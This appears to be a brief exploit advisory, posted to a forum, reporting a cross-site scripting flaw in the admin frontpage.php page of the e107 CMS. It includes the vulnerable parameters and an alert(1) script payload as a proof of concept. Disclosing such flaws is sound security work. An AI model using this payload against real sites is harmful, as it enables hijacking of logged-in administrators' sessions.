xss in e107 (for logged only)

[testujemy]

Kod:

# exploit title: xss in e107 (for logged only) 
# date: 12.o2.2o11
# author: lemlajt
# software : e107 
# version: 2010-08-22 / 0.7 (?)
# tested on: linux
# cve : 
#
 
PoC : 

http://localhost/www/cmsadmins/e107/e107_admin/frontpage.php
$type and $class parameters are vulnerable to cross site scripting.
try: '';!--<script>alert(1)</script>={()}

btw: when you see xss, try to refresh this page with proxy (paros, or similar), and 
you should see more parameters: {()} (twice), so maybe here is just some noname error, or 
maybe we can inject code(?) 


info: cat /e107/e107_files/e107.js
|	e107 website system - Javascript File.
|
|	$URL: https://e107.svn.sourceforge.net/svnroot/e107/trunk/e107_0.7/e107_files/e107.js $
|	$Revision: 11678 $
|	$Id: e107.js 11678 2010-08-22 00:43:45Z e107coders $


# regards,
# lemlajt
# *